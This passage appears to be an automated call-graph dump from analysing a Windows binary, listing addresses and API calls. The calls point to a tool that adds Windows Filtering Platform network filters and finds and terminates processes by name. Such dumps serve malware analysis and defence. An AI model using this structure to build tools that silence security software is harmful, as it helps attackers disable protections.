24 API calls 9415->9416 9416->9411 9418 7ff764cc9ee1 9417->9418 9419 7ff764cc9f19 9417->9419 9420 7ff764cc9bb9 25 API calls 9418->9420 9421 7ff764cc14e2 24 API calls 9419->9421 9422 7ff764cc9ef4 9420->9422 9423 7ff764cc9ef8 9421->9423 9422->9423 9425 7ff764cc9d40 9422->9425 9423->9411 9423->9412 9426 7ff764cc9d73 9425->9426 9427 7ff764cc9d58 9425->9427 9430 7ff764cc14e2 24 API calls 9426->9430 9428 7ff764cc9da6 9427->9428 9429 7ff764cc9d5d 9427->9429 9433 7ff764cc14e2 24 API calls 9428->9433 9431 7ff764cc9dd9 9429->9431 9438 7ff764cc9d62 9429->9438 9432 7ff764cc9d9c 9430->9432 9434 7ff764cc14e2 24 API calls 9431->9434 9441 7ff764cc14e2 24 API calls 9432->9441 9433->9432 9434->9432 9435 7ff764cc9e3b 9435->9432 9437 7ff764cc9e44 9435->9437 9436 7ff764cc9e18 strcmp 9436->9438 9439 7ff764cc14e2 24 API calls 9437->9439 9438->9435 9438->9436 9440 7ff764cc9e69 9439->9440 9440->9423 9441->9440 9465 7ff764cc8008 GetFileAttributesW 9442->9465 9445 7ff764cc8192 wcslen 9482 7ff764cc7102 9445->9482 9446 7ff764cc8182 9446->9348 9449 7ff764cc82b9 FwpmFilterAdd0 9453 7ff764cc8461 9449->9453 9454 7ff764cc84ce FwpmFilterAdd0 9449->9454 9450 7ff764cc8239 FwpmFilterDeleteByKey0 9451 7ff764cc8277 FwpmFilterDeleteByKey0 9450->9451 9452 7ff764cc825a 9450->9452 9451->9446 9458 7ff764cc829c 9451->9458 9457 7ff764cc14e2 24 API calls 9452->9457 9459 7ff764cc14e2 24 API calls 9453->9459 9455 7ff764cc8540 9454->9455 9456 7ff764cc8474 9454->9456 9462 7ff764cc14e2 24 API calls 9455->9462 9460 7ff764cc84a1 9456->9460 9461 7ff764cc848a GetProcessHeap HeapFree 9456->9461 9457->9446 9463 7ff764cc14e2 24 API calls 9458->9463 9459->9456 9460->9446 9464 7ff764cc84b2 GetProcessHeap HeapFree 9460->9464 9461->9460 9462->9456 9463->9446 9464->9446 9466 7ff764cc8028 9465->9466 9467 7ff764cc8149 9465->9467 9488 7ff764cc7e04 9466->9488 9469 7ff764cc803b 9470 7ff764cc804f GetProcessHeap HeapAlloc 9469->9470 9480 7ff764cc8041 9469->9480 9471 7ff764cc80d9 9470->9471 9476 7ff764cc8071 9470->9476 9473 7ff764cc14e2 24 API calls 9471->9473 9472 7ff764cc807b wcslen GetProcessHeap HeapAlloc 9474 7ff764cc80f7 9472->9474 9475 7ff764cc80bb 9472->9475 9473->9476 9477 7ff764cc14e2 24 API calls 9474->9477 9478 7ff764cc810f 9475->9478 9479 7ff764cc80c7 memcpy 9475->9479 9476->9472 9476->9480 9477->9475 9478->9480 9481 7ff764cc8114 GetProcessHeap HeapFree 9478->9481 9479->9480 9480->9445 9480->9446 9481->9480 9483 7ff764cc711d 9482->9483 9484 7ff764cc710b 9482->9484 9485 7ff764cc14e2 24 API calls 9483->9485 9486 7ff764cc14e2 24 API calls 9484->9486 9487 7ff764cc7110 9484->9487 9485->9487 9486->9487 9487->9449 9487->9450 9489 7ff764cc7e59 9488->9489 9490 7ff764cc7e6f QueryDosDeviceW 9489->9490 9495 7ff764cc7e5f 9489->9495 9491 7ff764cc7e90 GetLastError 9490->9491 9492 7ff764cc7f6c 9490->9492 9493 7ff764cc14e2 24 API calls 9491->9493 9496 7ff764cc7de7 9492->9496 9493->9495 9495->9469 9499 7ff764ccb270 9496->9499 9500 7ff764ccb295 9499->9500 9501 7ff764ccb27e 9499->9501 9503 7ff764ccdadd fputwc fwprintf _errno 9500->9503 9502 7ff764ccdadd fputwc fwprintf _errno 9501->9502 9504 7ff764cc7dff 9502->9504 9503->9504 9504->9495 9506 7ff764cc1d02 LoadLibraryA 9505->9506 9507 7ff764cc1d2b 9505->9507 9508 7ff764cc1d10 9506->9508 9509 7ff764cc1d2e GetLastError 9506->9509 9507->9509 9510 7ff764cc14e2 24 API calls 9508->9510 9511 7ff764cc14e2 24 API calls 9509->9511 9512 7ff764cc1d29 9510->9512 9511->9512 9512->9354 9513 7ff764cc1c73 9512->9513 9514 7ff764cc1cc1 9513->9514 9515 7ff764cc1c90 GetProcAddress 9513->9515 9517 7ff764cc1cc6 GetLastError 9514->9517 9516 7ff764cc1ca1 9515->9516 9515->9517 9518 7ff764cc14e2 24 API calls 9516->9518 9519 7ff764cc14e2 24 API calls 9517->9519 9520 7ff764cc1cbf 9518->9520 9519->9520 9520->9354 9522 7ff764cc79a1 9521->9522 9523 7ff764cc7c4f 9521->9523 9525 7ff764cc7102 24 API calls 9522->9525 9524 7ff764cc14e2 24 API calls 9523->9524 9533 7ff764cc7c3b 9524->9533 9526 7ff764cc79b1 9525->9526 9527 7ff764cc7c6c FwpmFilterDeleteByKey0 9526->9527 9530 7ff764cc7a46 9526->9530 9528 7ff764cc7ca7 FwpmFilterDeleteByKey0 9527->9528 9529 7ff764cc7c8d 9527->9529 9532 7ff764cc7cd2 9528->9532 9528->9533 9531 7ff764cc14e2 24 API calls 9529->9531 9534 7ff764cc7b20 FwpmFilterAdd0 9530->9534 9531->9533 9535 7ff764cc14e2 24 API calls 9532->9535 9533->9374 9536 7ff764cc7cef FwpmFilterAdd0 9534->9536 9537 7ff764cc7c07 9534->9537 9535->9533 9539 7ff764cc7d5d 9536->9539 9538 7ff764cc14e2 24 API calls 9537->9538 9541 7ff764cc7c1a 9538->9541 9540 7ff764cc14e2 24 API calls 9539->9540 9543 7ff764cc7d7a 9540->9543 9541->9533 9542 7ff764cc7c24 GetProcessHeap HeapFree 9541->9542 9542->9533 11050 7ff764ccdcf8 11051 7ff764ccdd06 11050->11051 11052 7ff764ccdd4f 11051->11052 11053 7ff764ccdd3f 11051->11053 11055 7ff764ccd1bd fputwc 11052->11055 11054 7ff764ccd3c1 fputwc 11053->11054 11060 7ff764ccdb86 11054->11060 11055->11060 11056 7ff764cce2e0 11057 7ff764cce301 11056->11057 11058 7ff764ccccd9 2 API calls 11056->11058 11058->11057 11059 7ff764ccccd9 fputwc fwprintf 11059->11060 11060->11056 11060->11059 9874 7ff764cce1b5 9875 7ff764cce1bd localeconv 9874->9875 9877 7ff764ccdb86 9874->9877 9876 7ff764cd026c 6 API calls 9875->9876 9876->9877 9878 7ff764ccccd9 fputwc fwprintf 9877->9878 9879 7ff764cce2e0 9877->9879 9878->9877 9880 7ff764cce301 9879->9880 9881 7ff764ccccd9 2 API calls 9879->9881 9881->9880 10361 7ff764cd06b1 GetLastError 10730 7ff764cd03ab ___mb_cur_max_func ___lc_codepage_func 10731 7ff764cd03da 10730->10731 10732 7ff764cd0150 4 API calls 10731->10732 10733 7ff764cd03f9 10732->10733 9907 7ff764cca5a1 inet_addr 9914 7ff764ccc59e 9915 7ff764ccc5b4 9914->9915 9921 7ff764ccc130 9915->9921 9917 7ff764ccca67 9918 7ff764ccc382 9918->9917 9919 7ff764ccb3e7 fputc 9918->9919 9920 7ff764ccc1ae 19 API calls 9918->9920 9919->9918 9920->9918 9922 7ff764ccc141 9921->9922 9923 7ff764ccb2d0 6 API calls 9922->9923 9924 7ff764ccc171 9923->9924 9925 7ff764ccc193 9924->9925 9926 7ff764ccc186 9924->9926 9927 7ff764ccc08a 11 API calls 9925->9927 9928 7ff764ccb5da fputc 9926->9928 9929 7ff764ccc191 9927->9929 9928->9929 9929->9918 11085 7ff764ccc49e 11086 7ff764ccc4a7 11085->11086 11092 7ff764ccb593 11086->11092 11093 7ff764ccb5a3 11092->11093 11094 7ff764ccb5c1 strlen 11093->11094 11095 7ff764ccb5ba 11093->11095 11094->11095 9930 7ff764ccfd98 9931 7ff764ccf663 6 API calls 9930->9931 9932 7ff764ccfdb4 9931->9932 11096 7ff764cc749c 11097 7ff764cc74fd 11096->11097 11098 7ff764cc74bd 11096->11098 11101 7ff764cc14e2 24 API calls 11097->11101 11099 7ff764cc74c2 11098->11099 11100 7ff764cc7536 11098->11100 11102 7ff764cc756f 11099->11102 11103 7ff764cc74d6 strlen strlen 11099->11103 11104 7ff764cc14e2 24 API calls 11100->11104 11106 7ff764cc7526 11101->11106 11105 7ff764cc14e2 24 API calls 11102->11105 11103->11106 11104->11106 11105->11106 9946 7ff764ccc5cf 9947 7ff764ccc5e5 9946->9947 9953 7ff764ccb919 9947->9953 9949 7ff764ccca67 9950 7ff764ccb3e7 fputc 9951 7ff764ccc382 9950->9951 9951->9949 9951->9950 9952 7ff764ccc1ae 19 API calls 9951->9952 9952->9951 9954 7ff764ccb92a 9953->9954 9955 7ff764ccb2d0 6 API calls 9954->9955 9956 7ff764ccb957 9955->9956 9957 7ff764ccb96c 9956->9957 9958 7ff764ccb979 9956->9958 9959 7ff764ccb5da fputc 9957->9959 9960 7ff764ccb721 11 API calls 9958->9960 9963 7ff764ccb977 9959->9963 9961 7ff764ccb984 9960->9961 9962 7ff764ccb3e7 fputc 9961->9962 9961->9963 9962->9961 9963->9951 10362 7ff764cca6d0 10363 7ff764cca6f7 10362->10363 10364 7ff764cca763 fprintf 10363->10364 10752 7ff764cc6fd5 10753 7ff764cc6fe0 10752->10753 10754 7ff764cc6feb GetSystemTimeAsFileTime 10752->10754 10754->10753 10755 7ff764cc37c0 10756 7ff764cc1cf4 26 API calls 10755->10756 10757 7ff764cc37d0 10756->10757 10758 7ff764cc3816 10757->10758 10759 7ff764cc1c73 26 API calls 10757->10759 10760 7ff764cc37e4 10759->10760 10760->10758 10761 7ff764cc3820 GetLastError 10760->10761 10762 7ff764cc37fc 10760->10762 10764 7ff764cc14e2 24 API calls 10761->10764 10763 7ff764cc14e2 24 API calls 10762->10763 10763->10758 10764->10758 9973 7ff764cc5dc4 9974 7ff764cc5de5 9973->9974 9975 7ff764cc5df4 9974->9975 9976 7ff764cc5deb CloseHandle 9974->9976 9976->9975 11126 7ff764ccc4b9 11127 7ff764ccc4c7 11126->11127 11128 7ff764ccc50e 11127->11128 11129 7ff764ccc4fe 11127->11129 11131 7ff764ccb9b0 fputc 11128->11131 11130 7ff764ccbbb4 fputc 11129->11130 11133 7ff764ccc382 11130->11133 11131->11133 11132 7ff764ccca67 11133->11132 11134 7ff764ccb3e7 fputc 11133->11134 11135 7ff764ccc1ae 19 API calls 11133->11135 11134->11133 11135->11133 10783 7ff764cc1bbb 10784 7ff764cc1bf4 10783->10784 10785 7ff764cc1bcc 10783->10785 10787 7ff764cc14e2 24 API calls 10784->10787 10786 7ff764cc1bd1 10785->10786 10788 7ff764cc14e2 24 API calls 10785->10788 10787->10786 10788->10786 9982 7ff764cc2d71 9983 7ff764cc2f1c 9982->9983 9984 7ff764cc2f27 CloseHandle 9983->9984 9985 7ff764cc2f2d 9983->9985 9984->9985 9986 7ff764cc2f36 9985->9986 9987 7ff764cc29db 9985->9987 9988 7ff764cc14e2 24 API calls 9986->9988 9989 7ff764cc2a3c 9986->9989 9987->9989 9990 7ff764cc14e2 24 API calls 9987->9990 9988->9989 9990->9989 11166 7ff764ccdc75 11167 7ff764ccdccd 11166->11167 11168 7ff764ccdc8a 11166->11168 11169 7ff764cccfc8 strlen 11167->11169 11170 7ff764ccdcb4 wcslen 11168->11170 11171 7ff764ccdcad 11168->11171 11173 7ff764ccdb86 11169->11173 11170->11171 11172 7ff764ccccd9 2 API calls 11171->11172 11172->11173 11174 7ff764cce2e0 11173->11174 11177 7ff764ccccd9 fputwc fwprintf 11173->11177 11175 7ff764cce301 11174->11175 11176 7ff764ccccd9 2 API calls 11174->11176 11176->11175 11177->11173 10798 7ff764cc6776 10799 7ff764cc678c 10798->10799 10800 7ff764cc67fb 10798->10800 10801 7ff764cc6795 10799->10801 10802 7ff764cc682e 10799->10802 10803 7ff764cc14e2 24 API calls 10800->10803 10804 7ff764cc685e 10801->10804 10805 7ff764cc679e 10801->10805 10806 7ff764cc14e2 24 API calls 10802->10806 10821 7ff764cc6824 10803->10821 10809 7ff764cc14e2 24 API calls 10804->10809 10807 7ff764cc67aa ExpandEnvironmentStringsA 10805->10807 10808 7ff764cc688e 10805->10808 10806->10821 10811 7ff764cc6909 GetLastError 10807->10811 10812 7ff764cc67bb 10807->10812 10810 7ff764cc14e2 24 API calls 10808->10810 10809->10821 10810->10821 10817 7ff764cc14e2 24 API calls 10811->10817 10815 7ff764cc67c9 10812->10815 10816 7ff764cc69dc 10812->10816 10813 7ff764cc6a51 10814 7ff764cc14e2 24 API calls 10820 7ff764cc67f1 10814->10820 10818 7ff764cc14e2 24 API calls 10815->10818 10819 7ff764cc14e2 24 API calls 10816->10819 10817->10821 10818->10820 10819->10821 10821->10813 10821->10814 11178 7ff764cca072 11179 7ff764cca0b6 11178->11179 11180 7ff764cca08c 11178->11180 11181 7ff764cc14e2 24 API calls 11179->11181 11184 7ff764cc9f70 11180->11184 11183 7ff764cca0a3 11181->11183 11185 7ff764cc9f9b 11184->11185 11186 7ff764cc9fd7 11184->11186 11187 7ff764cc9ed0 26 API calls 11185->11187 11188 7ff764cc14e2 24 API calls 11186->11188 11189 7ff764cc9fae 11187->11189 11192 7ff764cc9fb4 11188->11192 11190 7ff764cca007 _errno 11189->11190 11189->11192 11191 7ff764cd0560 11190->11191 11193 7ff764cca029 _errno 11191->11193 11192->11183 11193->11192 11194 7ff764cca034 _errno 11193->11194 11195 7ff764cc14e2 24 API calls 11194->11195 11195->11192 10383 7ff764cca66c 10384 7ff764cca67e 10383->10384 10386 7ff764cca693 10384->10386 10387 7ff764ccaebd 10384->10387 10388 7ff764ccaecb 10387->10388 10389 7ff764ccaed3 10387->10389 10388->10389 10390 7ff764ccaee1 10388->10390 10392 7ff764ccaed1 10388->10392 10389->10386 10390->10389 10391 7ff764ccaeeb InitializeCriticalSection 10390->10391 10391->10389 10392->10389 10393 7ff764ccaf37 DeleteCriticalSection 10392->10393 10394 7ff764ccaf29 free 10392->10394 10393->10389 10394->10392 11217 7ff764cc4c69 11218 7ff764cc4be8 11217->11218 11219 7ff764cc4d5a 11218->11219 11220 7ff764cc4c0a 11218->11220 11221 7ff764cc14e2 24 API calls 11219->11221 11222 7ff764cc14e2 24 API calls 11220->11222 11223 7ff764cc4d7c 11221->11223 11224 7ff764cc4c20 11222->11224 11223->11223 10831 7ff764cca369 10832 7ff764cca3a7 10831->10832 10833 7ff764cca378 10831->10833 10834 7ff764cc14e2 24 API calls 10832->10834 10837 7ff764cca264 10833->10837 10836 7ff764cca390 10834->10836 10838 7ff764cca286 10837->10838 10839 7ff764cca2c9 10837->10839 10841 7ff764cc9ed0 26 API calls 10838->10841 10840 7ff764cc14e2 24 API calls 10839->10840 10843 7ff764cca29f 10840->10843 10842 7ff764cca299 10841->10842 10842->10843 10844 7ff764cca2f9 _errno _strtoui64 _errno 10842->10844 10843->10836 10844->10843 10845 7ff764cca32c _errno 10844->10845 10846 7ff764cc14e2 24 API calls 10845->10846 10846->10843 9991 7ff764cc1d60 9992 7ff764cc1e23 9991->9992 9993 7ff764cc1d77 9991->9993 9994 7ff764cc14e2 24 API calls 9992->9994 9995 7ff764cc1d80 OpenProcessToken 9993->9995 9996 7ff764cc1e53 9993->9996 10013 7ff764cc1e21 9994->10013 9998 7ff764cc1eb8 GetLastError 9995->9998 9999 7ff764cc1d98 GetTokenInformation 9995->9999 9997 7ff764cc14e2 24 API calls 9996->9997 9997->10013 10001 7ff764cc14e2 24 API calls 9998->10001 10000 7ff764cc1dce GetLastError 9999->10000 10016 7ff764cc1fcd 9999->10016 10003 7ff764cc1de0 10000->10003 10004 7ff764cc1f67 LocalAlloc 10000->10004 10001->10013 10002 7ff764cc2090 LocalAlloc 10006 7ff764cc20a8 GetLengthSid memcpy 10002->10006 10017 7ff764cc20cb 10002->10017 10008 7ff764cc14e2 24 API calls 10003->10008 10005 7ff764cc1f82 GetTokenInformation 10004->10005 10004->10017 10005->10002 10009 7ff764cc1fac GetLastError 10005->10009 10006->10017 10007 7ff764cc14e2 24 API calls 10010 7ff764cc1ead 10007->10010 10011 7ff764cc1df6 10008->10011 10012 7ff764cc14e2 24 API calls 10009->10012 10014 7ff764cc1e05 LocalFree 10011->10014 10015 7ff764cc1e0e CloseHandle 10011->10015 10012->10016 10013->10007 10014->10015 10015->10010 10015->10013 10016->10002 10016->10017 10018 7ff764cc6d60 10019 7ff764cc6d82 10018->10019 10020 7ff764cc6d6f 10018->10020 10023 7ff764cc14e2 24 API calls 10019->10023 10021 7ff764cc6db5 10020->10021 10022 7ff764cc6d74 10020->10022 10025 7ff764cc14e2 24 API calls 10021->10025 10024 7ff764cc6d79 10022->10024 10026 7ff764cc14e2 24 API calls 10022->10026 10023->10024 10025->10024 10026->10024 10847 7ff764cc3b64 10848 7ff764cc3bc1 10847->10848 10849 7ff764cc3b8a 10847->10849 10850 7ff764cc14e2 24 API calls 10848->10850 10851 7ff764cc3b8f 10849->10851 10852 7ff764cc3bec 10849->10852 10859 7ff764cc3bb9 10850->10859 10866 7ff764cc3909 10851->10866 10854 7ff764cc14e2 24 API calls 10852->10854 10854->10859 10856 7ff764cc3ba2 SetFileAttributesA 10857 7ff764cc3c3e GetLastError 10856->10857 10856->10859 10860 7ff764cc14e2 24 API calls 10857->10860 10858 7ff764cc3c6a 10861 7ff764cc3d7d 10858->10861 10864 7ff764cc3d02 10858->10864 10859->10857 10859->10858 10860->10859 10862 7ff764cc14e2 24 API calls 10861->10862 10863 7ff764cc3d30 10862->10863 10865 7ff764cc14e2 24 API calls 10864->10865 10865->10863 10867 7ff764cc3921 10866->10867 10868 7ff764cc3998 10866->10868 10870 7ff764cc39d1 10867->10870 10871 7ff764cc392a GetFileAttributesA 10867->10871 10869 7ff764cc14e2 24 API calls 10868->10869 10877 7ff764cc393b 10869->10877 10872 7ff764cc14e2 24 API calls 10870->10872 10873 7ff764cc3a0a GetLastError 10871->10873 10871->10877 10872->10877 10874 7ff764cc14e2 24 API calls 10873->10874 10874->10877 10875 7ff764cc3b3a 10876 7ff764cc14e2 24 API calls 10875->10876 10878 7ff764cc3b5f 10876->10878 10877->10875 10879 7ff764cc3974 10877->10879 10878->10878 10880 7ff764cc14e2 24 API calls 10879->10880 10881 7ff764cc398a 10880->10881 10881->10856 10881->10859 11241 7ff764cc2463 11242 7ff764cc2484 CloseHandle 11241->11242 11261 7ff764cc23f0 11242->11261 11243 7ff764cc26ed Process32Next 11245 7ff764cc2704 GetLastError 11243->11245 11243->11261 11244 7ff764cc2888 CloseHandle 11248 7ff764cc21e4 11244->11248 11249 7ff764cc28a3 11244->11249 11245->11261 11247 7ff764cc14e2 24 API calls 11247->11261 11248->11249 11252 7ff764cc21f4 11248->11252 11254 7ff764cc14e2 24 API calls 11249->11254 11250 7ff764cc24d3 OpenProcess 11255 7ff764cc24f4 TerminateProcess 11250->11255 11256 7ff764cc25a3 GetLastError 11250->11256 11251 7ff764cc24c2 strcmp 11251->11250 11251->11261 11253 7ff764cc14e2 24 API calls 11252->11253 11257 7ff764cc2211 11253->11257 11254->11257 11255->11242 11259 7ff764cc250a GetLastError 11255->11259 11258 7ff764cc14e2 24 API calls 11256->11258 11258->11261 11260 7ff764cc14e2 24 API calls 11259->11260 11260->11261 11261->11242 11261->11243 11261->11244 11261->11247 11261->11250 11261->11251 11262 7ff764cc3c63 11263 7ff764cc3cec 11262->11263 11264 7ff764cc3d7d 11263->11264 11267 7ff764cc3d02 11263->11267 11265 7ff764cc14e2 24 API calls 11264->11265 11266 7ff764cc3d30 11265->11266 11268 7ff764cc14e2 24 API calls 11267->11268 11268->11266 10042 7ff764ccdd5c 10043 7ff764ccdd6e 10042->10043 10050 7ff764ccd3c1 10043->10050 10045 7ff764cce2e0 10046 7ff764cce301 10045->10046 10047 7ff764ccccd9 2 API calls 10045->10047 10047->10046 10048 7ff764ccdb86 10048->10045 10049 7ff764ccccd9 fputwc fwprintf 10048->10049 10049->10048 10051 7ff764ccd3f3 10050->10051 10052 7ff764ccd513 10051->10052 10057 7ff764ccca90 fputwc 10051->10057 10053 7ff764ccd593 10052->10053 10054 7ff764ccca90 fputwc 10052->10054 10055 7ff764ccd5af 10053->10055 10056 7ff764ccca90 fputwc 10053->10056 10054->10052 10055->10048 10056->10053 10057->10051 10058 7ff764cc255d 10059 7ff764cc2484 CloseHandle 10058->10059 10078 7ff764cc23f0 10059->10078 10060 7ff764cc26ed Process32Next 10062 7ff764cc2704 GetLastError 10060->10062 10060->10078 10061 7ff764cc2888 CloseHandle 10065 7ff764cc21e4 10061->10065 10066 7ff764cc28a3 10061->10066 10062->10078 10064 7ff764cc14e2 24 API calls 10064->10078 10065->10066 10069 7ff764cc21f4 10065->10069 10071 7ff764cc14e2 24 API calls 10066->10071 10067 7ff764cc24d3 OpenProcess 10072 7ff764cc24f4 TerminateProcess 10067->10072 10073 7ff764cc25a3 GetLastError 10067->10073 10068 7ff764cc24c2 strcmp 10068->10067 10068->10078 10070 7ff764cc14e2 24 API calls 10069->10070 10074 7ff764cc2211 10070->10074 10071->10074 10072->10059 10076 7ff764cc250a GetLastError 10072->10076 10075 7ff764cc14e2 24 API calls 10073->10075 10075->10078 10077 7ff764cc14e2 24 API calls 10076->10077 10077->10078 10078->10058 10078->10059 10078->10060 10078->10061 10078->10064 10078->10067 10078->10068 10079 7ff764ccc958 10080 7ff764ccc960 localeconv 10079->10080 10083 7ff764ccc382 10079->10083 10081 7ff764cd026c 6 API calls 10080->10081 10081->10083 10082 7ff764ccca67 10083->10082 10084 7ff764ccb3e7 fputc 10083->10084 10085 7ff764ccc1ae 19 API calls 10083->10085 10084->10083 10085->10083 10882 7ff764cc475d 10883 7ff764cc4b28 10882->10883 10884 7ff764cc4b35 10883->10884 10885 7ff764cc4b2d fclose 10883->10885 10886 7ff764cc4ba2 10884->10886 10887 7ff764cc4b39 10884->10887 10885->10884 10888 7ff764cc14e2 24 API calls 10886->10888 10889 7ff764cc14e2 24 API calls 10887->10889 10890 7ff764cc4b78 10888->10890 10889->10890 10395 7ff764ccde59 10396 7ff764ccde6f 10395->10396 10403 7ff764ccd9bb 10396->10403 10398 7ff764cce2e0 10399 7ff764cce301 10398->10399 10400 7ff764ccccd9 2 API calls 10398->10400 10400->10399 10401 7ff764ccdb86 10401->10398 10402 7ff764ccccd9 fputwc fwprintf 10401->10402 10402->10401 10404 7ff764ccd9cd 10403->10404 10405 7ff764ccd00f 6 API calls 10404->10405 10406 7ff764ccda05 10405->10406 10407 7ff764ccda2c 10406->10407 10408 7ff764ccda1a 10406->10408 10410 7ff764ccda9d 10407->10410 10412 7ff764ccda42 10407->10412 10409 7ff764cccc00 10 API calls 10408->10409 10417 7ff764ccda27 10409->10417 10411 7ff764ccdaa8 strlen 10410->10411 10413 7ff764ccdaa1 10410->10413 10411->10413 10414 7ff764ccda46 10412->10414 10415 7ff764ccda4e strlen 10412->10415 10416 7ff764ccd897 9 API calls 10413->10416 10418 7ff764cccdd0 9 API calls 10414->10418 10415->10414 10416->10417 10417->10401 10419 7ff764ccda81 10418->10419 10419->10417 10420 7ff764ccca90 fputwc 10419->10420 10420->10419 11269 7ff764cc385c 11270 7ff764cc3869 11269->11270 11277 7ff764cc38a9 11269->11277 11272 7ff764cc1cf4 26 API calls 11270->11272 11271 7ff764cc14e2 24 API calls 11276 7ff764cc38ce 11271->11276 11273 7ff764cc3875 11272->11273 11274 7ff764cc1c73 26 API calls 11273->11274 11273->11276 11275 7ff764cc3889 11274->11275 11275->11276 11275->11277 11278 7ff764cc38d8 GetLastError 11275->11278 11277->11271 11279 7ff764cc14e2 24 API calls 11278->11279 11279->11276 11301 7ff764ccac96 11302 7ff764ccad13 signal 11301->11302 11304 7ff764ccaca1 11301->11304 11303 7ff764ccad25 signal 11302->11303 11302->11304 11303->11304 11305 7ff764cc7096 11306 7ff764cc70b2 strlen 11305->11306 11307 7ff764cc70c7 11305->11307 11306->11307 11314 7ff764cd0088 ___lc_codepage_func ___mb_cur_max_func 11315 7ff764cd00f1 11314->11315 11316 7ff764cd00b7 11314->11316 11317 7ff764cd00c3 11316->11317 11320 7ff764cd00bc 11316->11320 11317->11315 11318 7ff764ccffd0 2 API calls 11317->11318 11318->11317 11319 7ff764ccffd0 2 API calls 11319->11320 11320->11315 11320->11319 10421 7ff764cd0689 GetProcessHeap 10422 7ff764ccde8a 10425 7ff764ccdea6 10422->10425 10423 7ff764cccc00 10 API calls 10432 7ff764ccdb86 10423->10432 10424 7ff764ccdf21 10433 7ff764ccd5bc 10424->10433 10425->10424 10426 7ff764ccdf1c 10425->10426 10426->10423 10428 7ff764cce2e0 10429 7ff764cce301 10428->10429 10430 7ff764ccccd9 2 API calls 10428->10430 10430->10429 10431 7ff764ccccd9 fputwc fwprintf 10431->10432 10432->10428 10432->10431 10434 7ff764ccd5d3 10433->10434 10436 7ff764ccd76b 10434->10436 10441 7ff764ccca90 fputwc 10434->10441 10435 7ff764ccca90 fputwc 10437 7ff764ccd7aa 10435->10437 10436->10435 10436->10437 10438 7ff764ccca90 fputwc 10437->10438 10439 7ff764ccd7b7 10438->10439 10440 7ff764ccca90 fputwc 10439->10440 10443 7ff764ccd7c8 10440->10443 10441->10434 10442 7ff764ccd815 10446 7ff764ccd861 10442->10446 10449 7ff764ccca90 fputwc 10442->10449 10444 7ff764ccca90 fputwc 10443->10444 10445 7ff764ccd7ce 10443->10445 10444->10443 10445->10442 10447 7ff764cccc72 7 API calls 10445->10447 10448 7ff764ccca90 fputwc 10445->10448 10452 7ff764ccccd9 2 API calls 10445->10452 10450 7ff764ccca90 fputwc 10446->10450 10447->10445 10448->10445 10449->10442 10451 7ff764ccd875 10450->10451 10452->10445 10145 7ff764cc9181 10156 7ff764cc8e2e 10145->10156 10146 7ff764cc90f2 GetProcessHeap HeapFree 10146->10156 10147 7ff764cc8da0 10148 7ff764cc9284 10147->10148 10149 7ff764cc8da9 FreeLibrary 10147->10149 10149->10148 10150 7ff764cca1f1 29 API calls 10150->10156 10151 7ff764cc8ecc strlen 10151->10156 10152 7ff764cc8f64 GetProcessHeap HeapAlloc 10152->10156 10153 7ff764cc8fb2 BuildTrusteeWithSidW BuildSecurityDescriptorW 10153->10156 10154 7ff764cc14e2 24 API calls 10154->10156 10155 7ff764cc795a 32 API calls 10155->10156 10156->10146 10156->10147 10156->10150 10156->10151 10156->10152 10156->10153 10156->10154 10156->10155 10157 7ff764cc91dc LocalFree 10156->10157 10157->10156 10918 7ff764cd0781 BuildTrusteeWithSidW 10182 7ff764cc212f 10183 7ff764cc21b6 10182->10183 10184 7ff764cc2159 CreateToolhelp32Snapshot 10182->10184 10187 7ff764cc14e2 24 API calls 10183->10187 10185 7ff764cc2175 Process32First 10184->10185 10186 7ff764cc2227 GetLastError 10184->10186 10189 7ff764cc22ff GetLastError 10185->10189 10209 7ff764cc21a6 10185->10209 10188 7ff764cc14e2 24 API calls 10186->10188 10198 7ff764cc21df 10187->10198 10188->10198 10190 7ff764cc230c 10189->10190 10192 7ff764cc14e2 24 API calls 10190->10192 10191 7ff764cc2888 CloseHandle 10193 7ff764cc28a3 10191->10193 10191->10198 10192->10209 10202 7ff764cc14e2 24 API calls 10193->10202 10194 7ff764cc21f4 10195 7ff764cc14e2 24 API calls 10194->10195 10197 7ff764cc2211 10195->10197 10198->10193 10198->10194 10199 7ff764cc24d3 OpenProcess 10203 7ff764cc24f4 TerminateProcess 10199->10203 10204 7ff764cc25a3 GetLastError 10199->10204 10200 7ff764cc24c2 strcmp 10200->10199 10200->10209 10201 7ff764cc26ed Process32Next 10208 7ff764cc2704 GetLastError 10201->10208 10201->10209 10202->10197 10206 7ff764cc2484 CloseHandle 10203->10206 10207 7ff764cc250a GetLastError 10203->10207 10205 7ff764cc14e2 24 API calls 10204->10205 10205->10209 10206->10209 10210 7ff764cc14e2 24 API calls 10207->10210 10208->10209 10209->10191 10209->10199 10209->10200 10209->10201 10209->10206 10211 7ff764cc14e2 24 API calls 10209->10211 10210->10209 10211->10209 11339 7ff764cc702f 11340 7ff764cc7057 wcslen 11339->11340 11341 7ff764cc704b 11339->11341 11340->11341 11342 7ff764ccc436 11343 7ff764ccc44b 11342->11343 11344 7ff764ccc48e 11342->11344 11346 7ff764ccc475 wcslen 11343->11346 11347 7ff764ccc46e 11343->11347 11345 7ff764ccb593 strlen 11344->11345 11350 7ff764ccc382 11345->11350 11346->11347 11348 7ff764ccb420 5 API calls 11347->11348 11348->11350 11349 7ff764ccca67 11350->11349 11351 7ff764ccb3e7 fputc 11350->11351 11352 7ff764ccc1ae 19 API calls 11350->11352 11351->11350 11352->11350 11353 7ff764ccdc2f 11354 7ff764ccdc56 11353->11354 11355 7ff764ccdc62 11353->11355 11357 7ff764ccccd9 2 API calls 11354->11357 11361 7ff764ccdb86 11354->11361 11356 7ff764cccacd 10 API calls 11355->11356 11356->11354 11357->11361 11358 7ff764cce2e0 11359 7ff764cce301 11358->11359 11360 7ff764ccccd9 2 API calls 11358->11360 11360->11359 11361->11358 11362 7ff764ccccd9 fputwc fwprintf 11361->11362 11362->11361 10482 7ff764ccc631 10485 7ff764ccc64d 10482->10485 10483 7ff764ccb5da fputc 10489 7ff764ccc382 10483->10489 10484 7ff764ccc6c3 10484->10483 10485->10484 10486 7ff764ccc6c8 10485->10486 10492 7ff764ccbdaf 10486->10492 10488 7ff764ccca67 10489->10488 10490 7ff764ccb3e7 fputc 10489->10490 10491 7ff764ccc1ae 19 API calls 10489->10491 10490->10489 10491->10489 10497 7ff764ccbdc6 10492->10497 10493 7ff764ccbf5e 10494 7ff764ccbf9d 10493->10494 10495 7ff764ccb3e7 fputc 10493->10495 10496 7ff764ccb3e7 fputc 10494->10496 10495->10494 10498 7ff764ccbfaa 10496->10498 10497->10493 10500 7ff764ccb3e7 fputc 10497->10500 10499 